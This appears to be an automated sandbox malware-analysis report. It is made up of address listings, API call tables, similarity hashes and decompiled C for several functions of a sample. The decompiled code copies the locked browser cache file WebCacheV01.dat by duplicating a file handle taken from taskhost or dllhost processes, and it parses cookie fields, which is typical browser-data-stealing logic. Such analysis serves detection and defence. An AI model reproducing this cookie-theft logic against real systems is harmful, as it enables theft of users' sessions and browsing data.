                                                                                                                                                      0x00403d20
                                                                                                                                                      0x00403d28
                                                                                                                                                      0x00403d3c
                                                                                                                                                      0x00403d2a
                                                                                                                                                      0x00403d2a
                                                                                                                                                      0x00403d31
                                                                                                                                                      0x00403d37
                                                                                                                                                      0x00403d37
                                                                                                                                                      0x00403d43
                                                                                                                                                      0x00403d46
                                                                                                                                                      0x00403d4e
                                                                                                                                                      0x00403d62
                                                                                                                                                      0x00403d50
                                                                                                                                                      0x00403d50
                                                                                                                                                      0x00403d57
                                                                                                                                                      0x00403d5d
                                                                                                                                                      0x00403d5d
                                                                                                                                                      0x00403d69
                                                                                                                                                      0x00403d6e
                                                                                                                                                      0x00403d7c
                                                                                                                                                      0x00403d81
                                                                                                                                                      0x00403d81
                                                                                                                                                      0x00403d84
                                                                                                                                                      0x00403d89
                                                                                                                                                      0x00403d97
                                                                                                                                                      0x00403d9c
                                                                                                                                                      0x00403d9c
                                                                                                                                                      0x00403d9f
                                                                                                                                                      0x00403da4
                                                                                                                                                      0x00403dac
                                                                                                                                                      0x00403dac
                                                                                                                                                      0x00403daf
                                                                                                                                                      0x00403db4
                                                                                                                                                      0x00403dd0
                                                                                                                                                      0x00403dd6
                                                                                                                                                      0x00403db6
                                                                                                                                                      0x00403dc2
                                                                                                                                                      0x00403dc8
                                                                                                                                                      0x00403dc8
                                                                                                                                                      0x00403de8
                                                                                                                                                      0x00403dee
                                                                                                                                                      0x00403dee
                                                                                                                                                      0x00403c9f
                                                                                                                                                      0x00403dfb
                                                                                                                                                      0x00403e06
                                                                                                                                                      0x00403e0b
                                                                                                                                                      0x00403e10
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00403e06

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 004048DA: _wcsicmp.MSVCRT ref: 0040490F
                                                                                                                                                        • Part of subcall function 00404BE4: memset.MSVCRT ref: 00404CE0
                                                                                                                                                      • free.MSVCRT(?,?,?,?,?,?), ref: 00403E0B
                                                                                                                                                        • Part of subcall function 004039C1: _wcsicmp.MSVCRT ref: 004039DA
                                                                                                                                                      • memset.MSVCRT ref: 00403CCA
                                                                                                                                                        • Part of subcall function 0040637A: wcslen.MSVCRT ref: 0040638D
                                                                                                                                                        • Part of subcall function 0040637A: memcpy.MSVCRT ref: 004063AC
                                                                                                                                                      • memcpy.MSVCRT ref: 00403D7C
                                                                                                                                                      • memcpy.MSVCRT ref: 00403D97
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcpy$_wcsicmpmemset$freewcslen
                                                                                                                                                      • String ID: $EntryId$Expires$Flags$LastModified$Name$Path$RDomain$Value
                                                                                                                                                      • API String ID: 4182952938-1692241855
                                                                                                                                                      • Opcode ID: a0a7945c210b4147cc27cadda54a762df6b682028906b78dd32beb38a9cdaeb6
                                                                                                                                                      • Instruction ID: d25acf1ba17ca876296ee2e242e904372f251ddc37699a211d4a96aadb20766e
                                                                                                                                                      • Opcode Fuzzy Hash: a0a7945c210b4147cc27cadda54a762df6b682028906b78dd32beb38a9cdaeb6
                                                                                                                                                      • Instruction Fuzzy Hash: D071E9B1D002199BCF20EFA5D881ADEBBB8BF04305F54447BE505BB281DB789A458F58
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004039F6, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 127fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 90%
                                                                                                                                                      			E004039F6(void* __eax) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				char _v52;
				void _v578;
				int _v580;
				void _v1106;
				long _v1108;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t44;
				signed short _t48;
				int _t55;
				void* _t60;
				signed int _t63;
				void* _t77;
				void* _t94;
				signed short* _t100;
				void* _t102;

				_t102 = __eax;
				_t44 =  *((intOrPtr*)(__eax + 0x63c));
				_t100 = __eax + 0x430;
				_v8 = 0;
				 *_t100 = 0;
				if(_t44 != 1) {
					__eflags = _t44 - 2;
					if(__eflags == 0) {
						_t48 = E00403FDE(__eax + 4, __eflags, __eax + 0x640);
						__eflags = _t48;
						if(_t48 == 0) {
							_v8 =  *((intOrPtr*)(_t102 + 0x418));
						}
					}
					L15:
					return _v8;
				}
				_v580 = 0;
				memset( &_v578, 0, 0x208);
				_v1108 = _v1108 & 0x00000000;
				memset( &_v1106, 0, 0x208);
				E0040DACC( &_v1108, 0); // executed
				_t55 = wcslen(L"Microsoft\\Windows\\WebCache\\WebCacheV01.dat");
				_t12 = wcslen( &_v1108) + 1; // 0x1
				if(_t55 + _t12 >= 0x104) {
					_t15 =  &_v580;
					 *_t15 = _v580 & 0x00000000;
					__eflags =  *_t15;
				} else {
					E00405930( &_v580,  &_v1108, L"Microsoft\\Windows\\WebCache\\WebCacheV01.dat");
				}
				_t60 = E004057D1( &_v580);
				_t109 = _t60;
				_pop(_t94);
				if(_t60 == 0) {
					_v8 = 0xfffffffd;
				} else {
					_t90 = _t102 + 4;
					_t63 = E00403FDE(_t102 + 4, _t109,  &_v580);
					_t110 = _t63;
					if(_t63 == 0) {
						_v20 = _v20 & _t63;
						_v16 = _v16 & _t63;
						_v12 = 0x1388;
						E00406264(E0040621C( &_v52), _t94, L"dllhost.exe");
						E00406264( &_v52, _t94, L"taskhost.exe");
						E00406264( &_v52, _t94, L"taskhostex.exe");
						E00406264( &_v52, _t94, L"taskhostw.exe");
						E0040567E(_t100, L"ecv"); // executed
						_t77 = E0040C5E9(_t110,  &_v20,  &_v52,  &_v580, _t100); // executed
						_t111 = _t77;
						_push(_t100);
						if(_t77 == 0) {
							_v8 = 0xfffffffe;
							DeleteFileW(??);
							 *_t100 =  *_t100 & 0x00000000;
							__eflags =  *_t100;
						} else {
							if(E00403FDE(_t90, _t111) == 0) {
								_v8 =  *((intOrPtr*)(_t102 + 0x418));
							}
						}
						E0040623E( &_v52);
						E00406710( &_v20);
					}
				}
			}
























                                                                                                                                                      0x00403a01
                                                                                                                                                      0x00403a03
                                                                                                                                                      0x00403a0f
                                                                                                                                                      0x00403a15
                                                                                                                                                      0x00403a18
                                                                                                                                                      0x00403a1b
                                                                                                                                                      0x00403b86
                                                                                                                                                      0x00403b89
                                                                                                                                                      0x00403b95
                                                                                                                                                      0x00403b9a
                                                                                                                                                      0x00403b9c
                                                                                                                                                      0x00403ba4
                                                                                                                                                      0x00403ba4
                                                                                                                                                      0x00403b9c
                                                                                                                                                      0x00403ba7
                                                                                                                                                      0x00403bae
                                                                                                                                                      0x00403bae
                                                                                                                                                      0x00403a2f
                                                                                                                                                      0x00403a36
                                                                                                                                                      0x00403a3b
                                                                                                                                                      0x00403a50
                                                                                                                                                      0x00403a5e
                                                                                                                                                      0x00403a68
                                                                                                                                                      0x00403a7c
                                                                                                                                                      0x00403a86
                                                                                                                                                      0x00403aa3
                                                                                                                                                      0x00403aa3
                                                                                                                                                      0x00403aa3
                                                                                                                                                      0x00403a88
                                                                                                                                                      0x00403a9a
                                                                                                                                                      0x00403aa0
                                                                                                                                                      0x00403ab2
                                                                                                                                                      0x00403ab7
                                                                                                                                                      0x00403ab9
                                                                                                                                                      0x00403aba
                                                                                                                                                      0x00403b7d
                                                                                                                                                      0x00403ac0
                                                                                                                                                      0x00403ac6
                                                                                                                                                      0x00403acc
                                                                                                                                                      0x00403ad1
                                                                                                                                                      0x00403ad3
                                                                                                                                                      0x00403ad9
                                                                                                                                                      0x00403adc
                                                                                                                                                      0x00403ae2
                                                                                                                                                      0x00403af3
                                                                                                                                                      0x00403b00
                                                                                                                                                      0x00403b0d
                                                                                                                                                      0x00403b1a
                                                                                                                                                      0x00403b24
                                                                                                                                                      0x00403b3a
                                                                                                                                                      0x00403b3f
                                                                                                                                                      0x00403b41
                                                                                                                                                      0x00403b42
                                                                                                                                                      0x00403b5a
                                                                                                                                                      0x00403b61
                                                                                                                                                      0x00403b67
                                                                                                                                                      0x00403b67
                                                                                                                                                      0x00403b44
                                                                                                                                                      0x00403b4d
                                                                                                                                                      0x00403b55
                                                                                                                                                      0x00403b55
                                                                                                                                                      0x00403b4d
                                                                                                                                                      0x00403b6e
                                                                                                                                                      0x00403b76
                                                                                                                                                      0x00403b76
                                                                                                                                                      0x00403ad3

                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 00403A36
                                                                                                                                                      • memset.MSVCRT ref: 00403A50
                                                                                                                                                        • Part of subcall function 0040DACC: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?), ref: 0040DAEF
                                                                                                                                                      • wcslen.MSVCRT ref: 00403A68
                                                                                                                                                      • wcslen.MSVCRT ref: 00403A77
                                                                                                                                                        • Part of subcall function 00405930: wcscpy.MSVCRT ref: 00405938
                                                                                                                                                        • Part of subcall function 00405930: wcscat.MSVCRT ref: 00405947
                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000000,?,taskhostw.exe,taskhostex.exe,taskhost.exe,dllhost.exe,00000000), ref: 00403B61
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memsetwcslen$DeleteFileFolderPathSpecialwcscatwcscpy
                                                                                                                                                      • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$dllhost.exe$ecv$taskhost.exe$taskhostex.exe$taskhostw.exe
                                                                                                                                                      • API String ID: 2175868439-3212516833
                                                                                                                                                      • Opcode ID: 24fc45b670e89c90fc9f8dccd731adadcc036b3d9691952aae2eeb5ea30e9faf
                                                                                                                                                      • Instruction ID: a022d5ce61393d47798dcb13383e44886591ba6ad6dcc354a4b6cd20eba80d87
                                                                                                                                                      • Opcode Fuzzy Hash: 24fc45b670e89c90fc9f8dccd731adadcc036b3d9691952aae2eeb5ea30e9faf
                                                                                                                                                      • Instruction Fuzzy Hash: 4B41677291061996DB10EFA5DC85ADE73BCEF04319F10457FE505F21C2EB38AB488B59
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040E0A4, Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 32%
                                                                                                                                                      			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t35;
				intOrPtr* _t37;
				intOrPtr* _t38;
				void* _t41;
				intOrPtr _t43;
				intOrPtr _t47;
				signed int _t49;
				signed int _t51;
				int _t53;
				int _t54;
				signed int _t56;
				signed int _t57;
				signed int _t58;
				int _t61;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr* _t66;
				void* _t67;
				signed int _t71;
				int _t72;
				void* _t73;
				intOrPtr _t81;

				_t67 = __edx;
				_push(0x70);
				_push(0x40f3f0);
				E0040E2B8(__ebx, __edi, __esi);
				_t35 = GetModuleHandleA(0);
				if(_t35->i != 0x5a4d) {
					L4:
					 *(_t73 - 0x1c) = 0;
				} else {
					_t66 =  *((intOrPtr*)(_t35 + 0x3c)) + _t35;
					if( *_t66 != 0x4550) {
						goto L4;
					} else {
						_t57 =  *(_t66 + 0x18) & 0x0000ffff;
						if(_t57 == 0x10b) {
							__eflags =  *((intOrPtr*)(_t66 + 0x74)) - 0xe;
							if( *((intOrPtr*)(_t66 + 0x74)) <= 0xe) {
								goto L4;
							} else {
								_t58 = 0;
								__eflags =  *(_t66 + 0xe8);
								goto L9;
							}
						} else {
							if(_t57 == 0x20b) {
								__eflags =  *((intOrPtr*)(_t66 + 0x84)) - 0xe;
								if( *((intOrPtr*)(_t66 + 0x84)) <= 0xe) {
									goto L4;
								} else {
									_t58 = 0;
									__eflags =  *(_t66 + 0xf8);
									L9:
									_t9 = __eflags != 0;
									__eflags = _t9;
									 *(_t73 - 0x1c) = _t58 & 0xffffff00 | _t9;
								}
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t73 - 4) = 0;
				_t61 = 2;
				__set_app_type(_t61);
				 *0x413700 =  *0x413700 | 0xffffffff;
				 *0x413704 =  *0x413704 | 0xffffffff;
				_t37 = __p__fmode();
				_t63 =  *0x41238c; // 0x0
				 *_t37 = _t63;
				_t38 = __p__commode();
				_t64 =  *0x412388; // 0x0
				 *_t38 = _t64;
				 *0x4136fc =  *_adjust_fdiv;
				_t41 = E0040E2B2();
				_t81 =  *0x412000; // 0x1
				if(_t81 == 0) {
					__setusermatherr(E0040E2B2);
					_pop(_t64);
				}
				E0040E2A0(_t41);
				L0040E29A();
				_t43 =  *0x412384; // 0x0
				 *((intOrPtr*)(_t73 - 0x20)) = _t43;
				_t47 = _t73 - 0x2c;
				__imp____wgetmainargs(_t47, _t73 - 0x28, _t73 - 0x24,  *0x412380, _t73 - 0x20, 0x40f3c0, 0x40f3c4); // executed
				 *((intOrPtr*)(_t73 - 0x30)) = _t47;
				_push(0x40f3bc);
				_push(0x40f394); // executed
				L0040E29A(); // executed
				_t71 =  *__imp___wcmdln;
				if(_t71 != 0) {
					 *(_t73 - 0x34) = _t71;
					__eflags =  *_t71 - 0x22;
					if( *_t71 != 0x22) {
						while(1) {
							__eflags =  *_t71 - 0x20;
							if( *_t71 <= 0x20) {
								goto L19;
							}
							_t71 = _t71 + _t61;
							 *(_t73 - 0x34) = _t71;
						}
					} else {
						while(1) {
							_t71 = _t71 + _t61;
							 *(_t73 - 0x34) = _t71;
							_t56 =  *_t71;
							__eflags = _t56;
							if(_t56 == 0) {
								break;
							}
							__eflags = _t56 - 0x22;
							if(_t56 != 0x22) {
								continue;
							}
							break;
						}
						__eflags =  *_t71 - 0x22;
						if( *_t71 == 0x22) {
							L18:
							_t71 = _t71 + _t61;
							__eflags = _t71;
							 *(_t73 - 0x34) = _t71;
						}
					}
					L19:
					_t49 =  *_t71;
					__eflags = _t49;
					if(_t49 != 0) {
						__eflags = _t49 - 0x20;
						if(_t49 <= 0x20) {
							goto L18;
						}
					}
					 *(_t73 - 0x4c) = 0;
					GetStartupInfoW(_t73 - 0x78);
					__eflags =  *(_t73 - 0x4c) & 0x00000001;
					if(__eflags == 0) {
						_t51 = 0xa;
					} else {
						_t51 =  *(_t73 - 0x48) & 0x0000ffff;
					}
					_t53 = E0040BE98(_t64, _t67, __eflags, GetModuleHandleA(0), 0, _t71, _t51); // executed
					_t72 = _t53;
					 *(_t73 - 0x7c) = _t72;
					__eflags =  *(_t73 - 0x1c);
					if( *(_t73 - 0x1c) == 0) {
						exit(_t72); // executed
					}
					__imp___cexit();
					_t32 = _t73 - 4;
					 *_t32 =  *(_t73 - 4) | 0xffffffff;
					__eflags =  *_t32;
					_t54 = _t72;
				} else {
					 *(_t73 - 4) =  *(_t73 - 4) | 0xffffffff;
					_t54 = 0xff;
				}
				return E0040E2F1(_t54);
			}

























                                                                                                                                                      0x0040e0a4
                                                                                                                                                      0x0040e0a4
                                                                                                                                                      0x0040e0a6
                                                                                                                                                      0x0040e0ab
                                                                                                                                                      0x0040e0b3
                                                                                                                                                      0x0040e0be
                                                                                                                                                      0x0040e0df
                                                                                                                                                      0x0040e0df
                                                                                                                                                      0x0040e0c0
                                                                                                                                                      0x0040e0c3
                                                                                                                                                      0x0040e0cb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040e0cd
                                                                                                                                                      0x0040e0cd
                                                                                                                                                      0x0040e0d6
                                                                                                                                                      0x0040e0f7
                                                                                                                                                      0x0040e0fb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040e0fd
                                                                                                                                                      0x0040e0fd
                                                                                                                                                      0x0040e0ff
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040e0ff
                                                                                                                                                      0x0040e0d8
                                                                                                                                                      0x0040e0dd
                                                                                                                                                      0x0040e0e4
                                                                                                                                                      0x0040e0eb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040e0ed
                                                                                                                                                      0x0040e0ed
                                                                                                                                                      0x0040e0ef
                                                                                                                                                      0x0040e105
                                                                                                                                                      0x0040e105
                                                                                                                                                      0x0040e105
                                                                                                                                                      0x0040e108
                                                                                                                                                      0x0040e108
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040e0dd
                                                                                                                                                      0x0040e0d6
                                                                                                                                                      0x0040e0cb
                                                                                                                                                      0x0040e10b
                                                                                                                                                      0x0040e110
                                                                                                                                                      0x0040e112
                                                                                                                                                      0x0040e119
                                                                                                                                                      0x0040e120
                                                                                                                                                      0x0040e127
                                                                                                                                                      0x0040e12d
                                                                                                                                                      0x0040e133
                                                                                                                                                      0x0040e135
                                                                                                                                                      0x0040e13b
                                                                                                                                                      0x0040e141
                                                                                                                                                      0x0040e14a
                                                                                                                                                      0x0040e14f
                                                                                                                                                      0x0040e154
                                                                                                                                                      0x0040e15a
                                                                                                                                                      0x0040e161
                                                                                                                                                      0x0040e167
                                                                                                                                                      0x0040e167
                                                                                                                                                      0x0040e168
                                                                                                                                                      0x0040e177
                                                                                                                                                      0x0040e17c
                                                                                                                                                      0x0040e181
                                                                                                                                                      0x0040e196
                                                                                                                                                      0x0040e19a
                                                                                                                                                      0x0040e1a0
                                                                                                                                                      0x0040e1a3
                                                                                                                                                      0x0040e1a8
                                                                                                                                                      0x0040e1ad
                                                                                                                                                      0x0040e1ba
                                                                                                                                                      0x0040e1be
                                                                                                                                                      0x0040e1ce
                                                                                                                                                      0x0040e1d1
                                                                                                                                                      0x0040e1d5
                                                                                                                                                      0x0040e21c
                                                                                                                                                      0x0040e21c
                                                                                                                                                      0x0040e220
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040e222
                                                                                                                                                      0x0040e224
                                                                                                                                                      0x0040e224
                                                                                                                                                      0x0040e1d7
                                                                                                                                                      0x0040e1d7
                                                                                                                                                      0x0040e1d7
                                                                                                                                                      0x0040e1d9
                                                                                                                                                      0x0040e1dc
                                                                                                                                                      0x0040e1df
                                                                                                                                                      0x0040e1e2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040e1e4
                                                                                                                                                      0x0040e1e8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040e1e8
                                                                                                                                                      0x0040e1ea
                                                                                                                                                      0x0040e1ee
                                                                                                                                                      0x0040e1f0
                                                                                                                                                      0x0040e1f0
                                                                                                                                                      0x0040e1f0
                                                                                                                                                      0x0040e1f2
                                                                                                                                                      0x0040e1f2
                                                                                                                                                      0x0040e1ee
                                                                                                                                                      0x0040e1f5
                                                                                                                                                      0x0040e1f5
                                                                                                                                                      0x0040e1f8
                                                                                                                                                      0x0040e1fb
                                                                                                                                                      0x0040e1fd
                                                                                                                                                      0x0040e201
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040e201
                                                                                                                                                      0x0040e203
                                                                                                                                                      0x0040e20a
                                                                                                                                                      0x0040e210
                                                                                                                                                      0x0040e214
                                                                                                                                                      0x0040e22b
                                                                                                                                                      0x0040e216
                                                                                                                                                      0x0040e216
                                                                                                                                                      0x0040e216
                                                                                                                                                      0x0040e237
                                                                                                                                                      0x0040e23c
                                                                                                                                                      0x0040e23e
                                                                                                                                                      0x0040e241
                                                                                                                                                      0x0040e244
                                                                                                                                                      0x0040e247
                                                                                                                                                      0x0040e247
                                                                                                                                                      0x0040e24d
                                                                                                                                                      0x0040e282
                                                                                                                                                      0x0040e282
                                                                                                                                                      0x0040e282
                                                                                                                                                      0x0040e286
                                                                                                                                                      0x0040e1c0
                                                                                                                                                      0x0040e1c0
                                                                                                                                                      0x0040e1c4
                                                                                                                                                      0x0040e1c4
                                                                                                                                                      0x0040e28d

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2827331108-0
                                                                                                                                                      • Opcode ID: 40245389f9c07c4b53f7ef00b130c55aa1205e514562832f366077bc809bb39d
                                                                                                                                                      • Instruction ID: c002ea54ac36ed1473f3b1447c0311433b5c4b2607527e15f7219f70d0093426
                                                                                                                                                      • Opcode Fuzzy Hash: 40245389f9c07c4b53f7ef00b130c55aa1205e514562832f366077bc809bb39d
                                                                                                                                                      • Instruction Fuzzy Hash: C251A071C40215DBCB34AFA6D9489AD7BB4EB04310F20897FE821BB2E1D7794D96DB48
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0040C5E9, Relevance: 18.1, APIs: 12, Instructions: 100fileCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040C5E9(void* __eflags, void* _a4, long _a8, void* _a12, long _a16) {
				struct _OVERLAPPED* _v8;
				struct _OVERLAPPED* _v12;
				intOrPtr _v16;
				struct _OVERLAPPED* _v20;
				char _v24;
				void* __edi;
				void* __esi;
				void* _t38;
				void* _t41;
				void* _t49;
				void* _t52;
				int _t55;
				int _t57;
				void* _t67;

				_t57 = 0;
				_v8 = 0;
				_v12 = 0;
				_t38 = E0040C6FB(_a4, __eflags, _a8, _a12,  &_v8,  &_v12); // executed
				if(_t38 != 0) {
					_v24 = 0;
					_v20 = 0;
					_v16 = 0x1388;
					E00406729(0x8000,  &_v24);
					_t41 = OpenProcess(0x40, 0, _v8);
					_v8 = _t41;
					if(_t41 != 0) {
						_a12 = 0;
						DuplicateHandle(_v8, _v12, GetCurrentProcess(),  &_a12, 0x80000000, 0, 0); // executed
						if(_a12 != 0) {
							_a8 = GetFileSize(_a12, 0);
							_a4 = E00405351(_a16);
							_t49 = CreateFileMappingW(_a12, 0, 2, 0, 0, 0); // executed
							_v12 = _t49;
							if(_t49 != 0) {
								_t52 = MapViewOfFile(_t49, 4, 0, 0, _a8); // executed
								_t67 = _t52;
								if(_t67 != 0) {
									_a16 = 0;
									_t55 = WriteFile(_a4, _t67, _a8,  &_a16, 0); // executed
									_t57 = _t55;
									UnmapViewOfFile(_t67);
								}
								FindCloseChangeNotification(_v12); // executed
							}
							CloseHandle(_a4);
							CloseHandle(_a12);
						}
						CloseHandle(_v8);
					}
					E00406710( &_v24);
				}
				return _t57;
			}

















                                                                                                                                                      0x0040c601
                                                                                                                                                      0x0040c603
                                                                                                                                                      0x0040c606
                                                                                                                                                      0x0040c609
                                                                                                                                                      0x0040c610
                                                                                                                                                      0x0040c620
                                                                                                                                                      0x0040c623
                                                                                                                                                      0x0040c626
                                                                                                                                                      0x0040c62d
                                                                                                                                                      0x0040c638
                                                                                                                                                      0x0040c640
                                                                                                                                                      0x0040c643
                                                                                                                                                      0x0040c654
                                                                                                                                                      0x0040c664
                                                                                                                                                      0x0040c673
                                                                                                                                                      0x0040c682
                                                                                                                                                      0x0040c694
                                                                                                                                                      0x0040c697
                                                                                                                                                      0x0040c69f
                                                                                                                                                      0x0040c6a2
                                                                                                                                                      0x0040c6ac
                                                                                                                                                      0x0040c6b2
                                                                                                                                                      0x0040c6b6
                                                                                                                                                      0x0040c6c0
                                                                                                                                                      0x0040c6c7
                                                                                                                                                      0x0040c6ce
                                                                                                                                                      0x0040c6d0
                                                                                                                                                      0x0040c6d0
                                                                                                                                                      0x0040c6d9
                                                                                                                                                      0x0040c6d9
                                                                                                                                                      0x0040c6de
                                                                                                                                                      0x0040c6e3
                                                                                                                                                      0x0040c6e3
                                                                                                                                                      0x0040c6e8
                                                                                                                                                      0x0040c6e8
                                                                                                                                                      0x0040c6ed
                                                                                                                                                      0x0040c6f3
                                                                                                                                                      0x0040c6f8

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040C6FB: memset.MSVCRT ref: 0040C725
                                                                                                                                                        • Part of subcall function 0040C6FB: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000), ref: 0040C74C
                                                                                                                                                        • Part of subcall function 0040C6FB: FindCloseChangeNotification.KERNELBASE(?,?,?,?,00000000), ref: 0040C762
                                                                                                                                                        • Part of subcall function 0040C6FB: GetCurrentProcessId.KERNEL32(?,?,?,00000000), ref: 0040C76A
                                                                                                                                                        • Part of subcall function 0040C6FB: _wcsicmp.MSVCRT ref: 0040C816
                                                                                                                                                        • Part of subcall function 00406729: ??3@YAXPAX@Z.MSVCRT ref: 00406730
                                                                                                                                                        • Part of subcall function 00406729: ??2@YAPAXI@Z.MSVCRT ref: 0040673E
                                                                                                                                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C638
                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C657
                                                                                                                                                      • DuplicateHandle.KERNELBASE(00000000,?,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C664
                                                                                                                                                      • GetFileSize.KERNEL32(?,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C679
                                                                                                                                                        • Part of subcall function 00405351: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040972A,?,?,?,00000000,00000002,?,?,00000001), ref: 00405363
                                                                                                                                                      • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C697
                                                                                                                                                      • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00001388,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6AC
                                                                                                                                                      • WriteFile.KERNELBASE(?,00000000,00001388,?,00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6C7
                                                                                                                                                      • UnmapViewOfFile.KERNEL32(00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6D0
                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6D9
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6DE
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6E3
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,?,taskhostw.exe,taskhostex.exe), ref: 0040C6E8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000009.00000002.384842680.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000009.00000002.384819078.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384904826.000000000040F000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384932127.0000000000412000.00000004.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000009.00000002.384944042.0000000000414000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationView$??2@??3@DuplicateMappingOpenSizeUnmapWrite_wcsicmpmemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3028965261-0
                                                                                                                                                      • Opcode ID: 7fd0803a30c83c5bc1aafd51a2f712348a4be379966129774f9c7ee5fc6ab5be
                                                                                                                                                      • Instruction ID: e6db179c7e43cd6fbe3270d478d1169048f03751868c197fc0ca6440827a8631
                                                                                                                                                      • Opcode Fuzzy Hash: 7fd0803a30c83c5bc1aafd51a2f712348a4be379966129774f9c7ee5fc6ab5be
